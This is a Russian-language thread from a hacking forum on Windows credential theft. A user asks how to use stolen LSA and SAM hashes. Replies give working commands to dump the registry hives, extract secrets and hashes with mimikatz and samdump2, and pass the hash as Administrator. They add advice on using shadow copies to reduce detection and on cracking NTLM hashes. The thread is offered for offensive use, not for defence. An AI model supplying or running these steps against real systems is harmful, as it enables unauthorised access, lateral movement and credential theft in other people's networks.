• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc lsa/sam hash

Отслеживать
anubis_050

anubis_050

HDD-drive
Пользователь
Регистрация
08.02.2022
Сообщения
38
Реакции
6
Всем привет, такой вопрос, что можно сделать, если есть хеш lsa и sam. Пробовал через мимишку их заюзать, и всегда пишет неправльный логин или пароль. А расшифровать их не получается
 
Не всегда в сэме или lsa бывает хешей.
Для lsa нужно сдамить след образом:
Код: 
reg save HKLM\SYSTEM system & reg save HKLM\security security
После снятие мимиком
Код: 
lsadump::secrets /system:c:\temp\system /security:c:\temp\security
 
а если через CME снимали lsa хэши, как-то можно через них зайти, типо как по pth?
WhiteDragon сказал(а):
Для lsa нужно сдамить след образом:
Тут я так понимаю выдаст NTLM?
 
как снять LSA уже сказали, снять SAM
Код: 
reg save hklm\system system
reg save hklm\sam sam

А вот провести path-the-hash атаку можно только с нтлм хешем(лм:нт)
SAM файл содержит LM и NT(NTLM2) хеши
SECURITY файл содержит чистые пароли, НТ и ЛМ хеши, DES и AES керб ключи, и чаще всего там находится мскеш хеши (Domain Cached Credentials (DCC1 (MS Cache) and DCC2 (MS Cache 2)))
SYSTEM содержит инфу для декрипта SAM и SECURITY

Декрипт
Код: 
LSA
mimikatz\> privilege::debug
mimikatz\> lsadump::secrets /system:C:\SYSTEM /security:C:\SECURITY

SAM
kali$: samdump2 system sam 
 или
mimikatz\> lsadump::sam /system:C:\SYSTEM /sam:C:\SAM

Имея NTLM хеш, сможешь провести pth с помощью мимика следующим образом
Код: 
sekurlsa::pth /user:Administrator /domain:dom.loc /rc4:NTLM_hash
 
IIIIXX сказал(а):
А вот провести path-the-hash атаку можно только с нтлм хешем(лм:нт)
SAM файл содержит LM и NT(NTLM2) хеши
SECURITY файл содержит чистые пароли, НТ и ЛМ хеши, DES и AES керб ключи, и чаще всего там находится мскеш хеши (Domain Cached Credentials (DCC1 (MS Cache) and DCC2 (MS Cache 2)))
SYSTEM содержит инфу для декрипта SAM и SECURITY
Подмечу что можно снимать сэм и т.д. через теневую копию, что меньше детектов.

NTLM можно сбрутить и получить чистый пасс и через него войти.
netNTLMv1 - брутить надо и выдаст ntlm хеш, зависит от сложности пасса, но брутится не вечно.
netNTLMv2 - долго брутить.

В сетках редко выпадаются когда хеши получают вышеперечисленным методом. Мое мнение - лсасс дампить лучший метод.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх